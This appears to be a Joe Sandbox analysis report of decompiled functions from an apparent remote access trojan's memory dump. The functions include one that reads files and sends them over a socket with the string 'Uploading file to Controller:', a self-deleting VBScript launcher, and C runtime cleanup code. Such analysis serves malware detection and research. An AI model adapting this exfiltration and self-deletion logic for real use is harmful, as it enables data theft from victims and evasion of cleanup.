							E00445002(_t31);
							E00445002( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xffffcf90
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E00445002(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00445002(_t74);
			}















                    0x0044fb4e
                    0x0044fb52
                    0x0044fb5a
                    0x0044fb63
                    0x0044fb68
                    0x0044fb6f
                    0x0044fb77
                    0x0044fb7f
                    0x0044fb8a
                    0x0044fb90
                    0x0044fb91
                    0x0044fb99
                    0x0044fba1
                    0x0044fbac
                    0x0044fbb2
                    0x0044fbb6
                    0x0044fbc1
                    0x0044fbc7
                    0x0044fb68
                    0x0044fbc8
                    0x0044fbd0
                    0x0044fbe3
                    0x0044fbf6
                    0x0044fc04
                    0x0044fc0f
                    0x0044fc14
                    0x0044fc1d
                    0x0044fc25
                    0x0044fc26
                    0x0044fc2c
                    0x0044fc2f
                    0x0044fc32
                    0x0044fc39
                    0x0044fc3b
                    0x0044fc3f
                    0x0044fc47
                    0x0044fc4e
                    0x0044fc54
                    0x0044fc55
                    0x0044fc55
                    0x0044fc5c
                    0x0044fc5e
                    0x0044fc5e
                    0x0044fc63
                    0x0044fc6b
                    0x0044fc70
                    0x0044fc71
                    0x0044fc71
                    0x0044fc74
                    0x0044fc77
                    0x0044fc7a
                    0x0044fc7d
                    0x0044fc7d
                    0x0044fc8f

                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0044FB8A
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044ED9F
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDB1
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDC3
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDD5
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDE7
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EDF9
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE0B
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE1D
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE2F
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE41
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE53
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE65
                      • Part of subcall function 0044ED82: _free.LIBCMT ref: 0044EE77
                    • _free.LIBCMT ref: 0044FB7F
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 0044FBA1
                    • _free.LIBCMT ref: 0044FBB6
                    • _free.LIBCMT ref: 0044FBC1
                    • _free.LIBCMT ref: 0044FBE3
                    • _free.LIBCMT ref: 0044FBF6
                    • _free.LIBCMT ref: 0044FC04
                    • _free.LIBCMT ref: 0044FC0F
                    • _free.LIBCMT ref: 0044FC47
                    • _free.LIBCMT ref: 0044FC4E
                    • _free.LIBCMT ref: 0044FC6B
                    • _free.LIBCMT ref: 0044FC83
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: b7ef605ccd965c869b2e05edb79bfb80bd9a0298b636961e3ec43af93a1375b9
                    • Instruction ID: 3ab02cf78170ad634f8d0de65b9125c41ac80f736b079e9f2e4498fa10b99b54
                    • Opcode Fuzzy Hash: b7ef605ccd965c869b2e05edb79bfb80bd9a0298b636961e3ec43af93a1375b9
                    • Instruction Fuzzy Hash: 28316D71500A069FFF309A3AE846B5B73E8FF01318F10842FE498D6252DB39EC448B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004081EE Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E004081EE(void* __ecx, char _a4, char _a8, char _a28, void* _a32, char _a52) {
				char _v12;
				void* _v16;
				char _v28;
				void* _v40;
				char _v52;
				void* _v56;
				char _v64;
				char _v76;
				void* _v80;
				char _v100;
				void* _v104;
				char _v116;
				char _v124;
				char _v128;
				signed int _v140;
				char _v144;
				char _v148;
				struct %anon52 _v156;
				char _v164;
				void* _v168;
				struct %anon52 _v176;
				union _LARGE_INTEGER* _v180;
				void* _v184;
				intOrPtr _v188;
				long _v192;
				signed int _v196;
				intOrPtr _v200;
				union _LARGE_INTEGER* _v204;
				union _LARGE_INTEGER _v208;
				intOrPtr _v216;
				intOrPtr _v220;
				long _v224;
				signed int _v228;
				intOrPtr _v236;
				signed int _v244;
				intOrPtr _v248;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t94;
				void* _t101;
				void* _t111;
				void* _t113;
				void* _t121;
				signed int _t134;
				void* _t135;
				signed int _t136;
				void* _t146;
				void* _t150;
				void* _t161;
				void* _t164;
				signed int _t167;
				struct _OVERLAPPED* _t169;
				struct %anon52 _t192;
				signed int _t208;
				void* _t214;
				union _LARGE_INTEGER* _t247;
				void* _t255;
				void* _t256;
				union _LARGE_INTEGER _t261;
				void* _t262;
				void* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t276;

				_t266 =  &_v184;
				_v140 = _v140 & 0x00000000;
				_t255 = __ecx;
				_v176.LowPart = 0x186a0;
				if(_a4 != 0) {
					_t161 = E00406E3A(0x46a8f0);
					_t278 = _t161;
					if(_t161 != 0) {
						_t276 =  &_v184 - 0x18;
						E004086D0(_t167, _t276, 0x46a8f0, _t278,  &_a8);
						_t164 = E00419F8D(_t167,  &_v52, 0x46a8f0, _t264);
						_t266 = _t276 + 0x18;
						E00401EF3( &_a28, 0x46a8f0, _t256, _t164);
						E00401EE9();
					}
				}
				E0040480D(_t255);
				E004048A8(_t255, _t256, _t255);
				_t94 = E0041A879(_t167,  &_v124,  &_a28);
				_t267 = _t266 - 0x18;
				_t246 = E00402EF0(_t167,  &_v52, E00402EF0(_t167,  &_v28, E00402EF0(_t167,  &_v100, E0041A879(_t167,  &_v76,  &_a4), _t264, _t278, 0x472ec8), _t264, _t278,  &_a52), _t264, _t278, 0x472ec8);
				E00402E81(_t267, _t99, _t94);
				_push(0xb6);
				_t101 = E00404A81(_t255, _t99, _t278);
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				E00401FB8();
				if((_t167 & 0xffffff00 | _t101 == 0xffffffff) == 0) {
					_t169 = 0;
					_t265 = CreateFileW(E00401EE4( &_v12), 0x80000000, 1, 0, 3, 0x80, 0);
					__eflags = _t265 - 0xffffffff;
					if(__eflags != 0) {
						_v148 = 0;
						_v144 = 0;
						__imp__GetFileSizeEx( &_v148);
						_t247 = _v156.HighPart;
						_t192 = _v156;
						_v176 = _t192;
						_v180 = _t247;
						_v208.LowPart = _t192;
						_v200 = _t247;
						_v196 = 1;
						_v192 = 0;
						_t111 = E00455B00(_t192, _t247, 0x186a0, 0);
						asm("adc edx, ebx");
						_t113 = E0041A723(0,  &_v140, _t247, _t111 + 1, _t247);
						_t268 = _t267 - 0x10;
						E00402E81(_t268, E00402EF0(0,  &_v164, E0041A723(0,  &_v116, _t247, _v192, _v196), _t265, __eflags, 0x472ec8), _t113);
						E00404A81(_t255, _t115, __eflags, 0xb7, _t265);
						E00401FB8();
						E00401FB8();
						E00401FB8();
						_t121 = E0041A819( &_v192,  &_v64);
						_t269 = _t268 - 0x18;
						_t251 = "Uploading file to Controller: ";
						E004052DD(0, _t269, "Uploading file to Controller: ", _t265, __eflags, _t121);
						_t270 = _t269 - 0x14;
						E00402073(0, _t270, "Uploading file to Controller: ", _t265, "i");
						E0041A04A(0, _t255);
						_t271 = _t270 + 0x30;
						_t208 =  &_v196;
						E00401FB8();
						asm("xorps xmm0, xmm0");
						asm("movlpd [esp+0x40], xmm0");
						__eflags = _v228;
						if(__eflags < 0) {
							L22:
							CloseHandle(_t265);
							E00404E06(_t251);
							_t169 = 1;
							goto L23;
						}
						if(__eflags > 0) {
							L11:
							_t261 = 0;
							__eflags = 0;
							_v204 = _v180;
							_v208.LowPart = _v184;
							_t134 = 0x186a0;
							goto L12;
							do {
								do {
									L12:
									_t246 = _v220;
									__eflags = _t261 - _t246;
									if(__eflags < 0) {
										L16:
										_push(_t134);
										_t135 = E004330A3(_t208, _t246, _t261, __eflags);
										_push(_t169);
										_t262 = _t135;
										_v192 = _t169;
										_v184 = _t262;
										_t136 = SetFilePointerEx(_t265, _v208.LowPart, _v204, _t169);
										__eflags = _t136;
										if(_t136 == 0) {
											_t272 = _t271 - 0x18;
											_t214 = _t271 - 0x18;
											_push("SetFilePointerEx error");
											L27:
											E00402073(_t169, _t214, _t246, _t265);
											E00402073(_t169, _t272 - 0x18, _t246, _t265, "E");
											E0041A04A(_t169, _t255);
											E004330AC(_t262);
											CloseHandle(_t265);
											L28:
											E00404E06(_t246);
											goto L23;
										}
										__eflags = ReadFile(_t265, _t262, _v224,  &_v192, _t169);
										if(__eflags == 0) {
											_t272 = _t271 - 0x18;
											_t214 = _t271 - 0x18;
											_push("ReadFile error");
											goto L27;
										}
										_t146 = E00402097(_t169,  &_v144, _t246, _t265, __eflags, _t262, _v192);
										_t271 = _t271 - 0x18;
										_t253 = E00402EF0(_t169,  &_v176, E0041A723(_t169,  &_v128, _t246, _v224, _v220), _t265, __eflags, 0x472ec8);
										E00402E81(_t271, _t148, _t146);
										_push(0x52);
										_t150 = E00404A81(_t255, _t148, __eflags);
										__eflags = _t150 - 0xffffffff;
										E00401FB8();
										E00401FB8();
										E00401FB8();
										__eflags = _t169 & 0xffffff00 | _t150 == 0xffffffff;
										if((_t169 & 0xffffff00 | _t150 == 0xffffffff) != 0) {
											E00404E06(_t253);
											CloseHandle(_t265);
											E004330AC(_v204);
											goto L5;
										}
										goto L19;
									}
									_t208 = _v228;
									if(__eflags > 0) {
										L15:
										_t134 = _t208;
										_v188 = _t246;
										_v224 = _t134;
										goto L16;
									}
									__eflags = _t134 - _t208;
									if(__eflags <= 0) {
										goto L16;
									}
									goto L15;
									L19:
									E004330AC(_v204);
									_t134 = _v244;
									_v248 = _v248 - _t134;
									_t261 = _v208;
									asm("sbb [esp+0x20], esi");
									_v236 = _v236 + 1;
									_t251 = _v224;
									_t169 = 0;
									asm("adc [esp+0x24], ebx");
									_t208 = _v228 + _t134;
									_v228 = _t208;
									asm("adc edx, esi");
									_v224 = _t251;
									__eflags = _t251 - _v220;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L22;
								}
								__eflags = _t208 - _v216;
							} while (_t208 < _v216);
							goto L22;
						}
						__eflags = _v196;
						if(_v196 <= 0) {
							goto L22;
						}
						goto L11;
					}
					E00402073(0, _t267 - 0x18, _t246, _t265, 0x464074);
					_push(0x53);
					E00404A81(_t255, _t246, __eflags);
					goto L28;
				} else {
					E00404E06(_t246);
					L5:
					_t169 = 0;
					L23:
					E00401EE9();
					E00401EE9();
					E00401FB8();
					return _t169;
				}
			}









































































                    0x004081ee
                    0x004081f4
                    0x00408205
                    0x00408207
                    0x0040820f
                    0x0040821d
                    0x00408222
                    0x00408224
                    0x00408226
                    0x00408233
                    0x0040823f
                    0x00408244
                    0x0040824f
                    0x0040825b
                    0x0040825b
                    0x00408224
                    0x00408262
                    0x0040826a
                    0x0040827a
                    0x0040827f
                    0x004082d4
                    0x004082d8
                    0x004082de
                    0x004082e5
                    0x004082f7
                    0x00408303
                    0x0040830c
                    0x00408318
                    0x00408321
                    0x00408328
                    0x00408338
                    0x0040835d
                    0x0040835f
                    0x00408362
                    0x00408385
                    0x0040838b
                    0x0040838f
                    0x00408395
                    0x0040839e
                    0x004083a8
                    0x004083ad
                    0x004083b1
                    0x004083b5
                    0x004083b9
                    0x004083bd
                    0x004083c1
                    0x004083cc
                    0x004083d0
                    0x004083d5
                    0x00408406
                    0x00408413
                    0x0040841c
                    0x00408428
                    0x00408431
                    0x00408441
                    0x00408446
                    0x00408449
                    0x00408451
                    0x00408456
                    0x00408460
                    0x00408465
                    0x0040846a
                    0x0040846d
                    0x00408471
                    0x00408476
                    0x00408479
                    0x0040847f
                    0x00408483
                    0x004085d7
                    0x004085d8
                    0x004085e0
                    0x004085e5
                    0x00000000
                    0x004085e5
                    0x00408489
                    0x00408495
                    0x00408499
                    0x00408499
                    0x0040849b
                    0x004084a3
                    0x004084a7
                    0x004084a7
                    0x004084ac
                    0x004084ac
                    0x004084ac
                    0x004084ac
                    0x004084b0
                    0x004084b2
                    0x004084c8
                    0x004084c8
                    0x004084c9
                    0x004084cf
                    0x004084d5
                    0x004084d7
                    0x004084df
                    0x004084e4
                    0x004084ea
                    0x004084ec
                    0x00408643
                    0x00408646
                    0x00408648
                    0x0040864d
                    0x0040864d
                    0x0040865c
                    0x00408661
                    0x00408667
                    0x00408670
                    0x00408676
                    0x00408678
                    0x00000000
                    0x00408678
                    0x00408505
                    0x00408507
                    0x00408637
                    0x0040863a
                    0x0040863c
                    0x00000000
                    0x0040863c
                    0x00408516
                    0x0040851b
                    0x00408548
                    0x0040854c
                    0x00408552
                    0x00408556
                    0x0040855b
                    0x00408565
                    0x00408571
                    0x0040857a
                    0x0040857f
                    0x00408581
                    0x0040861c
                    0x00408622
                    0x0040862c
                    0x00000000
                    0x00408631
                    0x00000000
                    0x00408581
                    0x004084b4
                    0x004084b8
                    0x004084be
                    0x004084be
                    0x004084c0
                    0x004084c4
                    0x00000000
                    0x004084c4
                    0x004084ba
                    0x004084bc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00408587
                    0x0040858b
                    0x00408590
                    0x00408594
                    0x00408598
                    0x0040859c
                    0x004085a0
                    0x004085a5
                    0x004085b0
                    0x004085b1
                    0x004085b5
                    0x004085b7
                    0x004085bb
                    0x004085bd
                    0x004085c1
                    0x004085c1
                    0x004085cb
                    0x00000000
                    0x00000000
                    0x004085cd
                    0x004085cd
                    0x00000000
                    0x004084ac
                    0x0040848b
                    0x0040848f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040848f
                    0x0040836e
                    0x00408373
                    0x00408377
                    0x00000000
                    0x0040832a
                    0x0040832c
                    0x00408331
                    0x00408331
                    0x004085e7
                    0x004085ee
                    0x004085fa
                    0x00408606
                    0x00408617
                    0x00408617

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408357
                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040838F
                    • __aulldiv.LIBCMT ref: 004083C1
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 004084E4
                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004084FF
                    • CloseHandle.KERNEL32(00000000), ref: 004085D8
                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408622
                    • CloseHandle.KERNEL32(00000000), ref: 00408670
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                    • API String ID: 3086580692-2596673759
                    • Opcode ID: bf49574db012d4a60fa7420fc0d34fff476f35aa7b6696aefef9dd8a36c94de1
                    • Instruction ID: 2e3c2baa84d0001f6d92d6a12086262f6ba3ffa6ab37ef3033deaea4bc0aa555
                    • Opcode Fuzzy Hash: bf49574db012d4a60fa7420fc0d34fff476f35aa7b6696aefef9dd8a36c94de1
                    • Instruction Fuzzy Hash: 31B1C1316083409BC314FB65C981AAFB7E9AFC4354F40492FF489622D2EF789945CB9B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040CD03 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040CD03(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;
				void* _t137;

				_t79 = __ebx;
				E00411D93();
				_t36 = E0040245C();
				_t37 = E00401F8B(0x473280);
				_t40 = E004129E0(E00401F8B(0x473238), "exepath",  &_v716, 0x208, _t37, _t36);
				_t141 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E00402FF4(_t79,  &_v124, E0041A7B9( &_v52, E0041A4D3( &_v76)), 0, _t137, _t141, L".vbs");
				E00401EE9();
				E00401FB8();
				E004042FD(_t79,  &_v100, E00402FF4(_t79,  &_v76, E0040415E(_t79,  &_v52, _t42, _t137, E0043A99F(_t79,  &_v76, _t141, L"Temp")), 0, _t137, _t141, "\\"), _t137, _t141,  &_v124);
				E00401EE9();
				E00401EE9();
				E00401F66(_t79,  &_v28);
				_t54 = E0040415E(_t79,  &_v196, _t49, _t137, L"\"\"\", 0");
				E0040323D(E00402FF4(_t79,  &_v76, E00402F85( &_v52, E00402FF4(_t79,  &_v148, E0040415E(_t79,  &_v172, _t49, _t137, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t137, _t141,  &_v716), _t54), 0, _t137, _t141, "\n"));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				L004086C6(_t79,  &_v28, 0, _t137, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = E00401EE4( &_v100);
				_t68 = E0040245C();
				E00401EE4( &_v28);
				if(E0041AD6A(_t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EE4( &_v100), 0x46a8f0, 0x46a8f0, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EE9();
				E00401EE9();
				return E00401EE9();
			}






















                    0x0040cd03
                    0x0040cd0e
                    0x0040cd1a
                    0x0040cd22
                    0x0040cd46
                    0x0040cd50
                    0x0040cd52
                    0x0040cd5d
                    0x0040cd5d
                    0x0040cd7f
                    0x0040cd88
                    0x0040cd90
                    0x0040cdc2
                    0x0040cdcb
                    0x0040cdd3
                    0x0040cddb
                    0x0040cdf0
                    0x0040ce35
                    0x0040ce3d
                    0x0040ce45
                    0x0040ce50
                    0x0040ce5b
                    0x0040ce66
                    0x0040ce73
                    0x0040ce7c
                    0x0040ce85
                    0x0040ce91
                    0x0040cea3
                    0x0040cec8
                    0x0040cec8
                    0x0040ced1
                    0x0040ced9
                    0x0040ceeb

                    APIs
                      • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                      • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                      • Part of subcall function 004129E0: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00473238), ref: 004129FC
                      • Part of subcall function 004129E0: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00412A15
                      • Part of subcall function 004129E0: RegCloseKey.KERNELBASE(00000000), ref: 00412A20
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,00000000,00000000), ref: 0040CD5D
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040CEBC
                    • ExitProcess.KERNEL32 ref: 0040CEC8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                    • String ID: """, 0$.vbs$82G$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                    • API String ID: 1913171305-4128442165
                    • Opcode ID: 598efda97eae89b6994bae8422a291eb7e13c3bad739fbf4068fde8bccd6e945
                    • Instruction ID: 0874bc144836ff93359e0d920a8661d2d2bf12b9c69f7d2e1fc1beb4cd6de9cb
                    • Opcode Fuzzy Hash: 598efda97eae89b6994bae8422a291eb7e13c3bad739fbf4068fde8bccd6e945
                    • Instruction Fuzzy Hash: C9414F319101185ACB14F7A2DC96DEE77B9AF50708F10017FF506B21E2EE385A4ACA99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044EE80 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                    Download Yara Rule
                    C-Code - Quality: 97%
                    			E0044EE80(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				char _t210;
				signed int _t213;
				void* _t224;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t224 = __edx;
				_t210 = _a4;
				_v16 = 0;
				_v28 = _t210;
				_v24 = 0;
				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
					_t234 = E004443F4(0, 1, 0x50);
					_v8 = _t234;
					E00445002(0);
					if(_t234 != 0) {
						_t227 = E004443F4(0, 1, 4);
						_v12 = _t227;
						E00445002(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
								_t213 = 0x14;
								memcpy(_v8, 0x46f188, _t213 << 2);
								L25:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t210 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L27;
							}
							_t232 = E004443F4(0, 1, 4);
							_v16 = _t232;
							E00445002(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t210 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E004516F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E004516F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E004516F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E004516F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E004516F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E004516F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E004516F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E004516F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E004516F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E004516F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E004516F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E004516F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E004516F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E004516F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E004516F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E004516F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E004516F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E004516F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while( *_t226 != 0) {
										_t195 =  *_t226;
										if(_t195 < 0x30 || _t195 > 0x39) {
											if(_t195 != 0x3b) {
												goto L17;
											}
											_t257 = _t226;
											do {
												 *_t257 =  *((intOrPtr*)(_t257 + 1));
												_t257 = _t257 + 1;
											} while ( *_t257 != 0);
										} else {
											 *_t226 = _t195 - 0x30;
											L17:
											_t226 = _t226 + 1;
										}
									}
									goto L25;
								}
								E0044ED82(_v8);
								E00445002(_v8);
								E00445002(_v12);
								E00445002(_v16);
								goto L4;
							}
							E00445002(_t234);
							E00445002(_v12);
							L7:
							goto L4;
						}
						E00445002(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0x46f188;
					L27:
					_t105 =  *(_t210 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E00445002( *(_t210 + 0x88));
							E00445002( *((intOrPtr*)(_t210 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
					 *(_t210 + 0x84) = _t231;
					 *(_t210 + 0x88) = _t236;
					return 0;
				}
			}












































                    0x0044ee80
                    0x0044ee89
                    0x0044ee90
                    0x0044ee93
                    0x0044ee96
                    0x0044ee9f
                    0x0044eec1
                    0x0044eec5
                    0x0044eec8
                    0x0044eed2
                    0x0044eee5
                    0x0044eee9
                    0x0044eeec
                    0x0044eef6
                    0x0044ef08
                    0x0044f19e
                    0x0044f19f
                    0x0044f1a1
                    0x0044f1a9
                    0x0044f1ad
                    0x0044f1b2
                    0x0044f1bd
                    0x0044f1c9
                    0x0044f1d5
                    0x0044f1e1
                    0x0044f1e7
                    0x0044f1eb
                    0x0044f1ed
                    0x0044f1ed
                    0x00000000
                    0x0044f1eb
                    0x0044ef17
                    0x0044ef1b
                    0x0044ef1e
                    0x0044ef28
                    0x0044ef3c
                    0x0044ef42
                    0x0044ef57
                    0x0044ef6b
                    0x0044ef82
                    0x0044ef9c
                    0x0044efa4
                    0x0044efb6
                    0x0044efcd
                    0x0044efe4
                    0x0044effe
                    0x0044f015
                    0x0044f02c
                    0x0044f043
                    0x0044f05d
                    0x0044f074
                    0x0044f08b
                    0x0044f0a2
                    0x0044f0bc
                    0x0044f0d3
                    0x0044f0ea
                    0x0044f101
                    0x0044f11b
                    0x0044f137
                    0x0044f165
                    0x0044f178
                    0x0044f169
                    0x0044f16d
                    0x0044f181
                    0x00000000
                    0x00000000
                    0x0044f183
                    0x0044f185
                    0x0044f188
                    0x0044f18a
                    0x0044f18d
                    0x0044f173
                    0x0044f175
                    0x0044f177
                    0x0044f177
                    0x0044f177
                    0x0044f16d
                    0x00000000
                    0x0044f17d
                    0x0044f13d
                    0x0044f143
                    0x0044f14c
